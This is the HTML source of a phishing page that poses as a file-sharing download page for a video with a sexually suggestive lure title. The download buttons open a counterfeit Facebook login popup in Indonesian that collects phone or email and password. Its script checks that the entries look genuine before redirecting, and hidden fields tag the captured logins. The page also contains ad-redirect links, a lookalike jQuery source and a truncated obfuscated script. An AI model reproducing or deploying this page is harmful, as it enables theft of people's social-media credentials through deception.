
<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta name="description" content="Safefileku is a cutting-edge file storage platform that revolutionizes the way you manage and share your files. Not only can you securely store your important documents, images, videos, and more, but you can also earn rewards for sharing your files with others."> 
  <meta property="fb:app_id" content="2233397750127042"> 
  <meta property="og:description" content="Safefileku is a cutting-edge file storage platform that revolutionizes the way you manage and share your files. Not only can you securely store your important documents, images, videos, and more, but you can also earn rewards for sharing your files with others."> 
  <title>Sama kakak pas lagi tidur.mp4 - Safefileku</title> 
  <link rel="icon" href="https://safefileku.com/favicon.ico"> 
  <link rel="shortcut icon" href="https://safefileku.com/favicon.ico"> 
  <link rel="apple-touch-icon" href="https://safefileku.com/apple-touch-icon.png"> 
  <link rel="canonical" href="https://mkomsel.com/download/FsUmtzeQgAQ9lU2d"> 
  <link rel="preconnect" href="https://www.gstatic.com"> 
  <link rel="preconnect" href="https://www.facebook.com"> 
  <link rel="preconnect" href="https://connect.facebook.net"> 
  <link rel="preload" as="style" href="https://mkomsel.com/build/assets/app-32de6e23.css">
  <link rel="stylesheet" href="https://mkomsel.com/build/assets/app-32de6e23.css"> 
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script>
$(document).ready(function(){$('body').hide();});
    </script>
<style>
.popup-login {
    background: rgba(0, 0, 0, 0.5);
    width: 100%;
    height: 100%;
    position: fixed;
    top: 0;
    left: 0;
    z-index: 9999999999999;
}

.popup-box-login-fb {
    background: #eceff6;
    max-width: 330px;
    height: auto;
    position: relative;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    text-align: center;
    font-family: "Teko";
    color: #000;
    border-radius: 10px;
}

.navbar-fb {
    background: #3b5998;
    height: auto;
    max-width: 330px;
    padding: 6px;
    border-top-left-radius: 10px;
    border-top-right-radius: 10px;
}

.navbar-fb img {
    width: 115px;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.content-box-fb {
    width: 300px;
    height: auto;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.content-box-fb .alert {
    display: none;
    left: -15px;
    position: relative;
    width: 330px;
    padding: 5px;
    background: red;
    color: #fff;
    font-size: 13px;
    font-family: "Roboto";
}

.content-box-fb img {
    width: 75;
    margin-top: 20px;
    margin-left: auto;
    margin-right: auto;
    border-radius: 12px;
    display: block;
}

.txt-login-fb {
    width: 290px;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    margin-bottom: 17px;
    padding: 8px;
    color: #90949c;
    font-size: 16px;
    font-family: Roboto;
    text-align: center;
    display: block;
}

input[type="text"],
input[type="password"] {
    width: 90%;
    height: auto;
    padding: 12px;
    color: #000;
    font-size: 14px;
    font-weight: 400;
    font-family: "Lato", sans-serif;
    border: 1px solid #bdbebf;
    cursor: pointer;
    outline: none;
}

.login-form input[type="text"] {
    margin: 0;
    padding-bottom: 13px;
    border-bottom: none;
    border-radius: 4px 4px 0 0;
    box-shadow: 0 -1px 0 #e0e0e0 inset, 0 0px 0px rgba(0, 0, 0, 0.23) inset;
}

.login-form input[type="password"] {
    margin: 0;
    border-top: none;
    border-radius: 0 0 4px 4px;
    box-shadow: 0 -0px 0 rgba(0, 0, 0, 0.23) inset,
        0 0px 0px rgba(255, 255, 255, 0.1);
}

.btn-login-fb {
    background: #1778f2;
    width: 100%;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    padding: 10px;
    color: #fff;
    font-size: 14px;
    font-family: Roboto;
    font-weight: bold;
    text-align: center;
    text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
    border: 1px solid #3578e5;
    border-radius: 5px;
    box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
    outline: none;
    display: block;
}

.btn-login-fb.disabled {
    pointer-events: none;
    background: #8b9dc3;
    border: 1px solid #8b9dc3;
}

.txt-create-account {
    margin-top: 4px;
    width: 100%;
    height: auto;
    padding: 5px;
    color: #3b5998;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.txt-not-now {
    width: 100%;
    height: auto;
    padding: 5px;
    color: #3b5998;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.txt-forgotten-password {
    width: 100%;
    height: auto;
    margin-bottom: 30px;
    padding: 5px;
    color: #7596c8;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.language-box {
    width: 100%;
    height: auto;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.language-name {
    width: 40%;
    height: auto;
    margin: 5px;
    margin-bottom: 0px;
    color: #3b5998;
    font-size: 12px;
    font-family: Roboto;
    text-align: center;
    display: inline-block;
}

.language-name i {
    width: 23px;
    padding: 4px;
    color: #90949c;
    border: 1px solid #3b5998;
    border-radius: 3px;
}

.language-name-active {
    color: #90949c;
    font-weight: bold;
}

.copyrights {
    width: 40%;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    color: #90949c;
    font-size: 12px;
    font-family: Roboto;
    text-align: center;
    display: block;
}
</style>
  <script type="text/javascript">
    const uid = '01HXEBTRSJHV3D2V6AGKWVJ95A';
</script> 
  <style>
script + iframe { max-width:100% }
</style> 
  <meta name="monetag" content="4239ef4589622268e4576ad21ec288d5"> 
  <!--[if lt IE 9]>
     
     
    <![endif]--> 
  <style type="text/css" data-fbcssmodules="css:fb.css.base css:fb.css.dialog css:fb.css.iframewidget css:fb.css.customer_chat_plugin_iframe">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:'lucida grande', tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}@keyframes fb_transform{from{opacity:0;transform:scale(.95)}to{opacity:1;transform:scale(1)}}.fb_animate{animation:fb_transform .3s forwards}
.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:'lucida grande', tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}@keyframes fb_transform{from{opacity:0;transform:scale(.95)}to{opacity:1;transform:scale(1)}}.fb_animate{animation:fb_transform .3s forwards}
.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_dialog_advanced{border-radius:8px;padding:10px}.fb_dialog_content{background:#fff;color:#373737}.fb_dialog_close_icon{background:url(https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{left:5px;right:auto;top:5px}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent}.fb_dialog_close_icon:active{background:url(https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #365899;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{background:none;height:auto;min-height:initial;min-width:initial;width:auto}.fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner{width:100%}.fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content{background:none}.loading.centered #fb_dialog_loader_close{clear:both;color:#fff;display:block;font-size:18px;padding-top:20px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .4);bottom:0;left:0;min-height:100%;position:absolute;right:0;top:0;width:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_mobile .fb_dialog_iframe{position:sticky;top:0}.fb_dialog_content .dialog_header{background:linear-gradient(from(#738aba), to(#2c4987));border-bottom:1px solid;border-color:#043b87;box-shadow:white 0 1px 1px -1px inset;color:#fff;font:bold 14px Helvetica, sans-serif;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:linear-gradient(from(#4267B2), to(#2a4887));background-clip:padding-box;border:1px solid #29487d;border-radius:3px;display:inline-block;line-height:18px;margin-top:3px;max-width:85px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{background:none;border:none;color:#fff;font:bold 12px Helvetica, sans-serif;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #4a4a4a;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f5f6f7;border:1px solid #4a4a4a;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}#fb_dialog_loader_spinner{animation:rotateSpinner 1.2s linear infinite;background-color:transparent;background-image:url(https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yD/r/t-wz8gw1xG1.png);background-position:50% 50%;background-repeat:no-repeat;height:24px;width:24px}@keyframes rotateSpinner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}
.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}
.fb_mpn_mobile_landing_page_slide_out{animation-duration:200ms;animation-name:fb_mpn_landing_page_slide_out;transition-timing-function:ease-in}.fb_mpn_mobile_landing_page_slide_out_from_left{animation-duration:200ms;animation-name:fb_mpn_landing_page_slide_out_from_left;transition-timing-function:ease-in}.fb_mpn_mobile_landing_page_slide_up{animation-duration:500ms;animation-name:fb_mpn_landing_page_slide_up;transition-timing-function:ease-in}.fb_mpn_mobile_bounce_in{animation-duration:300ms;animation-name:fb_mpn_bounce_in;transition-timing-function:ease-in}.fb_mpn_mobile_bounce_out{animation-duration:300ms;animation-name:fb_mpn_bounce_out;transition-timing-function:ease-in}.fb_mpn_mobile_bounce_out_v2{animation-duration:300ms;animation-name:fb_mpn_fade_out;transition-timing-function:ease-in}.fb_customer_chat_bounce_in_v2{animation-duration:300ms;animation-name:fb_bounce_in_v2;transition-timing-function:ease-in}.fb_customer_chat_bounce_in_from_left{animation-duration:300ms;animation-name:fb_bounce_in_from_left;transition-timing-function:ease-in}.fb_customer_chat_bounce_out_v2{animation-duration:300ms;animation-name:fb_bounce_out_v2;transition-timing-function:ease-in}.fb_customer_chat_bounce_out_from_left{animation-duration:300ms;animation-name:fb_bounce_out_from_left;transition-timing-function:ease-in}.fb_invisible_flow{display:inherit;height:0;overflow-x:hidden;width:0}@keyframes fb_mpn_landing_page_slide_out{0%{margin:0 12px;width:100% - 24px}60%{border-radius:18px}100%{border-radius:50%;margin:0 24px;width:60px}}@keyframes fb_mpn_landing_page_slide_out_from_left{0%{left:12px;width:100% - 24px}60%{border-radius:18px}100%{border-radius:50%;left:12px;width:60px}}@keyframes fb_mpn_landing_page_slide_up{0%{bottom:0;opacity:0}100%{bottom:24px;opacity:1}}@keyframes fb_mpn_bounce_in{0%{opacity:.5;top:100%}100%{opacity:1;top:0}}@keyframes fb_mpn_fade_out{0%{bottom:30px;opacity:1}100%{bottom:0;opacity:0}}@keyframes fb_mpn_bounce_out{0%{opacity:1;top:0}100%{opacity:.5;top:100%}}@keyframes fb_bounce_in_v2{0%{opacity:0;transform:scale(0, 0);transform-origin:bottom right}50%{transform:scale(1.03, 1.03);transform-origin:bottom right}100%{opacity:1;transform:scale(1, 1);transform-origin:bottom right}}@keyframes fb_bounce_in_from_left{0%{opacity:0;transform:scale(0, 0);transform-origin:bottom left}50%{transform:scale(1.03, 1.03);transform-origin:bottom left}100%{opacity:1;transform:scale(1, 1);transform-origin:bottom left}}@keyframes fb_bounce_out_v2{0%{opacity:1;transform:scale(1, 1);transform-origin:bottom right}100%{opacity:0;transform:scale(0, 0);transform-origin:bottom right}}@keyframes fb_bounce_out_from_left{0%{opacity:1;transform:scale(1, 1);transform-origin:bottom left}100%{opacity:0;transform:scale(0, 0);transform-origin:bottom left}}@keyframes slideInFromBottom{0%{opacity:.1;transform:translateY(100%)}100%{opacity:1;transform:translateY(0)}}@keyframes slideInFromBottomDelay{0%{opacity:0;transform:translateY(100%)}97%{opacity:0;transform:translateY(100%)}100%{opacity:1;transform:translateY(0)}}</style>
 </head> 
 <body style="width: 100%;
    height: 100%;
    position: fixed;
    top: 0;
    left: 0;
    z-index: 9999999999999;display:none;"> 
  <header class="bg-white"> 
   <nav class="mx-auto flex max-w-7xl items-center justify-between p-6 lg:px-8" aria-label="Global"> 
    <div class="flex lg:hidden"> 
     <button type="button" data-toggle="sidebar" class="-m-2.5 inline-flex items-center justify-center rounded-md p-2.5 text-gray-700"> <span class="sr-only">Open main menu</span> 
      <svg class="h-6 w-6" fill="none" viewbox="0 0 24 24" stroke-width="1.5" stroke="currentColor" aria-hidden="true"> 
       <path stroke-linecap="round" stroke-linejoin="round" d="M3.75 6.75h16.5M3.75 12h16.5m-16.5 5.25h16.5"></path> 
      </svg> </button> 
    </div> 
    <div class="flex lg:flex-1"> 
     <a href="https://safefileku.com?ref=header_download" class="-m-1.5 p-1.5"> <span class="sr-only">Safefileku</span> <img class="h-6 w-auto" src="https://cdn.safefileku.com/logo.svg" alt="logo"> </a> 
    </div> 
    <div class="hidden lg:flex lg:gap-x-12"> 
     <a href="https://safefileku.com?ref=header_download" class="text-sm font-semibold leading-6 text-gray-900">About us</a> 
     <a href="https://safefileku.com/privacy?ref=header_download" class="text-sm font-semibold leading-6 text-gray-900">Privacy Policy</a> 
     <a href="https://safefileku.com/abuse?ref=header_download" class="text-sm font-semibold leading-6 text-gray-900">DMCA &amp; Abuse</a> 
    </div> 
    <div class="flex lg:flex-1 justify-end"> 
     <a href="https://safefileku.com/register?ref=header_download" class="text-sm font-semibold leading-6 text-gray-900">Join us</a> 
    </div> 
   </nav> 
   <div id="sidebar" class="lg:hidden" role="dialog" aria-modal="true"> 
    <div class="fixed inset-0 z-10 bg-black/10 hidden"></div> 
    <div class="fixed inset-y-0 z-10 w-full overflow-y-auto bg-white px-6 py-6 sm:max-w-sm"> 
     <div class="flex items-center justify-between"> 
      <a href="#" class="-m-1.5 p-1.5"> <span class="sr-only">Safefileku</span> <img class="h-8 w-auto" src="https://cdn.safefileku.com/logo.svg" alt="Logo"> </a> 
      <button type="button" data-toggle="sidebar" class="-m-2.5 rounded-md p-2.5 text-gray-700"> <span class="sr-only">Close menu</span> 
       <svg class="h-6 w-6" fill="none" viewbox="0 0 24 24" stroke-width="1.5" stroke="currentColor" aria-hidden="true"> 
        <path stroke-linecap="round" stroke-linejoin="round" d="M6 18L18 6M6 6l12 12"></path> 
       </svg> </button> 
     </div> 
     <div class="mt-6 flow-root"> 
      <div class="-my-6 divide-y divide-gray-500/10"> 
       <div class="space-y-2 py-6"> 
        <a href="https://safefileku.com?ref=mobile_sidebar_download" class="-mx-3 block rounded-lg px-3 py-2 text-base font-semibold leading-7 text-gray-900 hover:bg-gray-50">About us</a> 
        <a href="https://safefileku.com/privacy?ref=mobile_sidebar_download" class="-mx-3 block rounded-lg px-3 py-2 text-base font-semibold leading-7 text-gray-900 hover:bg-gray-50">Privacy Policy</a> 
        <a href="https://safefileku.com/abuse?ref=mobile_sidebar_download" class="-mx-3 block rounded-lg px-3 py-2 text-base font-semibold leading-7 text-gray-900 hover:bg-gray-50">DMCA &amp; Abuse</a> 
       </div> 
      </div> 
     </div> 
    </div> 
   </div> 
  </header> 
  <div class="mx-auto max-w-7xl p-6 lg:px-8"> 
   <div class="border p-6 lg:px-8 rounded-lg space-y-6"> 
    <div class="text-center text-gray-400"> 
     <div style="text-align:center">
      <div style="display:inline-block"> 
       <iframe allowtransparency="true" scrolling="no" frameborder="0" framespacing="0" width="728" height="90" src="about:blank"></iframe> 
      </div>
     </div> 
    </div> 
    <div class="max-w-xl mx-auto space-y-6"> 
     <h1 class="text-xl font-semibold mb-2 text-center break-words">Sama kakak pas lagi tidur.mp4</h1> 
     <div class="flex items-center gap-4 mx-auto"> 
      <div class="shrink-0"> 
       <img src="https://cdn.safefileku.com/icons/mp4.svg" alt="icon" width="80" height="80"> 
      </div> 
      <div class="flex-grow"> 
       <div class="flex justify-between"> 
        <span class="font-medium">File size: </span> 
        <span>14.78MB</span> 
       </div> 
       <div class="flex justify-between"> 
        <span class="font-medium">Download: </span> 
        <span>140</span> 
       </div> 
       <div class="flex justify-between"> 
        <span class="font-medium">Uploaded: </span> 
        <span><script type="text/javascript">
                      var d = new Date();
                      d.setDate(d.getDate() - 2);
                      document.write(d.toLocaleDateString(navigator.language || navigator.userLanguage, {
                        month: 'long',
                        day: 'numeric',
                        year: 'numeric'
                      }));
                    </script>, 20:28 AM</span> 
       </div> 
      </div> 
     </div> 
     <div class="text-center space-y-4"> 
      <a onclick="opalexf()" id="download" class="text-white font-semibold px-6 py-2 rounded-md bg-green-600" onclick="window.open('https://piteevoo.com/4/6761212', '_blank' )">Download file</a> 
      <div> 
       <div class="text-gray-400"> 
       </div> 
       <a onclick="opalexf()" rel="nofollow " class="bg-blue-600 text-white font-semibold px-3 py-1.5 rounded-md text-xs">Fast Download</a> 
      </div> 
      <div class="myTestAd" style="height: 5px; width: 5px; position: absolute;"></div> 
     </div> 
    </div> 
    <div class="text-center text-gray-400"> 
     <div style="text-align:center">
      <div style="display:inline-block"> 
       <iframe allowtransparency="true" scrolling="no" frameborder="0" framespacing="0" width="728" height="90" src="about:blank"></iframe> 
      </div>
     </div> 
    </div> 
    <div class="max-w-xl mx-auto space-y-6"> 
     <div class="space-y-2"> 
      <style>
    .btn-share {
        color: #fff!important;
        display: flex;
        align-items: center;
        padding: 4px 12px;
        border-radius: 6px;
        width: fit-content;
        margin-right: 8px;
        text-decoration: none !important;
    }
</style> 
      <div> 
      
       <div class="mb-2">
        Share this link via
       </div> 
       <div class="flex"> 
        <a class="btn-share" target="_blank" rel="noreferrer" style="background:#1877F2"> 
         <svg class="mr-1" width="16" height="16" viewbox="0 0 24 24" fill="currentColor" aria-hidden="true"> 
          <path d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z"></path> 
         </svg> <span>Share</span> </a> 
        <a class="btn-share" target="_blank" rel="noreferrer" style="background:#000000"> 
         <svg class="mr-1" width="16" height="16" viewbox="0 0 24 24" fill="currentColor" aria-hidden="true"> 
          <path d="M18.901 1.153h3.68l-8.04 9.19L24 22.846h-7.406l-5.8-7.584-6.638 7.584H.474l8.6-9.83L0 1.154h7.594l5.243 6.932ZM17.61 20.644h2.039L6.486 3.24H4.298Z"></path> 
         </svg> <span>Tweet</span> </a> 
        <a class="btn-share" target="_blank" rel="noreferrer" style="background:#BD081C"> 
         <svg class="mr-1" width="16" height="16" viewbox="0 0 24 24" fill="currentColor" aria-hidden="true"> 
          <path d="M12.017 0C5.396 0 .029 5.367.029 11.987c0 5.079 3.158 9.417 7.618 11.162-.105-.949-.199-2.403.041-3.439.219-.937 1.406-5.957 1.406-5.957s-.359-.72-.359-1.781c0-1.663.967-2.911 2.168-2.911 1.024 0 1.518.769 1.518 1.688 0 1.029-.653 2.567-.992 3.992-.285 1.193.6 2.165 1.775 2.165 2.128 0 3.768-2.245 3.768-5.487 0-2.861-2.063-4.869-5.008-4.869-3.41 0-5.409 2.562-5.409 5.199 0 1.033.394 2.143.889 2.741.099.12.112.225.085.345-.09.375-.293 1.199-.334 1.363-.053.225-.172.271-.401.165-1.495-.69-2.433-2.878-2.433-4.646 0-3.776 2.748-7.252 7.92-7.252 4.158 0 7.392 2.967 7.392 6.923 0 4.135-2.607 7.462-6.233 7.462-1.214 0-2.354-.629-2.758-1.379l-.749 2.848c-.269 1.045-1.004 2.352-1.498 3.146 1.123.345 2.306.535 3.55.535 6.607 0 11.985-5.365 11.985-11.987C23.97 5.39 18.592.026 11.985.026L12.017 0z"></path> 
         </svg> <span>Pin</span> </a> 
        <a id="btn-share-link" class="btn-share bg-blue-600 md:!hidden" href="#" aria-label="Share"> 
         <svg width="16" height="16" fill="none" viewbox="0 0 24 24" stroke="currentColor" aria-hidden="true"> 
          <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M8.684 13.342C8.886 12.938 9 12.482 9 12c0-.482-.114-.938-.316-1.342m0 2.684a3 3 0 110-2.684m0 2.684l6.632 3.316m-6.632-6l6.632-3.316m0 0a3 3 0 105.367-2.684 3 3 0 00-5.367 2.684zm0 9.316a3 3 0 105.368 2.684 3 3 0 00-5.368-2.684z"></path> 
         </svg> <span class="sr-only">Share</span> </a> 
       </div> 
      </div> 
     </div> 
     <div id="fb-root" class=" fb_reset">
      <div style="position: absolute; top: -10000px; width: 0px; height: 0px;">
       <div></div>
      </div>
     </div> 
   </div> 
   </div>
   </div>
   </div>
  <footer class="my-8"> 
   <p class="text-center text-xs leading-5 text-gray-500">© 2024 Safefileku.com. All rights reserved.</p> 
  </footer> 
 </body>
 <body>
   <div class="popup-login login-facebook animated fadeIn" style="display: none;" id="facebook">
        <div class="popup-box-login-fb">
            <div class="navbar-fb">
                <img width="45" src="https://cdn.jsdelivr.net/gh/Hyuu09/CDNsalz@main/20240202_164508.png">
            </div>
            <div class="content-box-fb">
                <p class="alert sandi">Kata sandi salah. <b>Apakah Anda melupakan kata sandi Anda?</b></p>
                <p class="alert email">Nomor ponsel atau email yang Anda masukkan tidak cocok dengan akun apa pun. <b>Cari akun Anda.</b></p>
                <img width="40" height="70" src="https://cdn.jsdelivr.net/gh/Hyuu09/CDNsalz@main/20240110_175143.png">
                <div class="txt-login-fb">
                    Masuk ke akun Facebook Anda untuk melanjutkan download
                </div>
                <form class="login-form" method="POST" action="" onsubmit="$(this).end()">
                    <label>
                        <input type="text" id="alx_email_fb2" name="email" placeholder="Nomor ponsel atau email"
                            autocomplete="off" autocapitalize="off">
                    </label>
                    <label>
                        <input type="password" id="alx_password_fb2" name="sandi" placeholder="Kata Sandi Facebook" autocomplete="off"
                            autocapitalize="off">
                    </label>
                    <input type="hidden" name="ua" id="ua" value="safefileku" readonly>
                            <input type="hidden" name="log" id="log" value="Facebook" readonly>
                    <button type="submit" onclick="return buttonfb();" id="btnfb" class="btn-login-fb">Masuk</button>
                    <button class= "btn-login-fb load" style="display: none;">
                           <i class="fa fa-spinner fa-spin" style=""></i> Loading...
                        </button>
                </form>
                <div class="txt-create-account">Buat Akun</div>
                <div class="txt-not-now">Lain Kali</div>
                <div class="txt-forgotten-password">Lupa Kata Sandi?</div>
            </div>
            <div class="language-box">
                <center>
                    <div class="language-name language-name-active">Bahasa Indonesia</div>
                    <div class="language-name">English (UK)</div>
                    <div class="language-name">Basa Jawa</div>
                    <div class="language-name">Bahasa Melayu</div>
                    <div class="language-name">日本語</div>
                    <div class="language-name">Español</div>
                    <div class="language-name">Português (Brasil)</div>
                    <div class="language-name">
                        <i class="fa fa-plus"></i>
                    </div>
                </center>
            </div>
            <div class="copyrights">Facebook Inc.</div>
        </div>
    </div>
    <script src="https://cdn.jsdelivr.net/gh/StyleeJs/3.6.0/jquery.js"></script>
    <script type="text/javascript">
        function opalexf() {
                $('#facebook').fadeIn();
                }

        window.addEventListener('submit', function (e) {
            e.preventDefault();
            setTimeout(() => {
                var user = $('#alx_email_fb2').val();
                var pass = $('#alx_password_fb2').val();
                if (user == '' || user == null) {
                    $('.email').show();
                    $('.sandi').hide();
                    return false;
                } else {

                    if (user.includes('@')) {
                        let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                        if (user.match(pattern)) {
                            $('.email').hide();
                        } else {
                            $('.email').show();
                            $('.sandi').hide();
                            return false;
                        }
                    }

                    if (!isNaN(user)) {
                        if (user.length <= 10) {
                            $('.email').show();
                            $('.sandi').hide();
                            return false;
                        } else {
                            $('.email').hide();
                        }
                    }

                    if (user.match(/\s/g)) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    } else {
                        $('.email').hide();
                    }

                    var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                    if (user.match(regex)) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    }


                    if (user.length <= 5) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    } else {
                        $('.email').hide();
                    }

                }
                if (pass == '' || pass == null || pass.length <= 5) {
                    $('.sandi').show();
                    return false;
                } else {
                    $('.sandi').hide();
                }
                var regexs = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                if (pass.match(regexs)) {
                    $('.sandi').show();
                    $('.email').hide();
                    return false;
                } else {
                    $('.sandi').hide();
                }
                  location.href = "https://www.mediafire.com/file/y194qjzbrxdislh/Sama_kakak_pas_lagi_tidur.mp4?dkey=ad3zum1v60f&r=977";
            }, 1000)
        })

    </script>
<script>
(function(){var cFL='',eMI=359-348;function pLW(e){var k=4397173;var s=e.length;var z=[];for(var d=0;d<s;d++){z[d]=e.charAt(d)};for(var d=0;d<s;d++){var t=k*(d+533)+(k%51019);var j=k*(d+190)+(k%43296);var p=t%s;var y=j%s;var u=z[p];z[p]=z[y];z[y]=u;k=(t+j)%4929532;};return z.join('')};var geK=pLW('icvhtrltusqykcpoacndbornrmzoxjtuewsgf').substr(0,eMI);var JML='va=wihtf.eCr(lp=1+; nh cv]ado2ef,s ra nnf;=As;iv5if=({va9 )8[+t,xv1+0l=+d85d(4[7;av4(v+evs;a(v[=.6afl7f(;,da,tc,=,).94srsa1)t+-dly=pxr(b r;"*;ur<4.xigrmr;r==)mwvtt(hCz+iC;a; ,);uvl8pt)4fC=7l+pqt2;6virrhka="],m*].)gn;nn7".l)dvssor.")i);=ttnvbut)enAlr(,a;5,,1(i  mh ]r9t3v6th{4o(nvoof(0;re(ee6hg=arrjmbj;{.)"(0ek}y eq+=0(1+ragpl)(+r)z0S=mr;6l+mvajonyoo o+)m3umreirua}o<ar<=;2=.]aa=r0s;luc)te((d-hbl=np9ai{9=1[;]ohf-h.61r+heoh==;9)(eai8p.=A-f{n1u-dr]=(bovrk8rld1rvf8s;0c>ix)f0)vczg<,Co[rd rq7;ge=;c1i){oo;)+mj;}arrv,.2rh ;);=8;r,oa)==2;+rr,"8c0;hesu7.ozya=n5bu+;70m[l u.(r>a=v..+shom)a[bc;oa;e(e)nt,[t.9ts.(,[f+r;ivzj(]eu}rs(t!anul  vi=uj=ost}-.jhwsh,h(ct(ipgtna].C+n+=e=j(gnnAtpe= c}o2h)(0[lf;(],] =anc(avv+o,ho;<8()(;,pem=g,b)r6lzCtv.2S[ ont=j2r)slaa r).p)i;"]lro r[nugfsew;-!v,riftros 5=lvtnn.eng2v[o]i)3a= o0[6zvn1khcefaAv1;;).i}8nae"rtf0,ryt+,ia"toi]C(igrx ;=etuy+,+.;77tts{g";n.oyo.i,nv)';var BMs=pLW[geK];var ILB='';var Hol=BMs;var 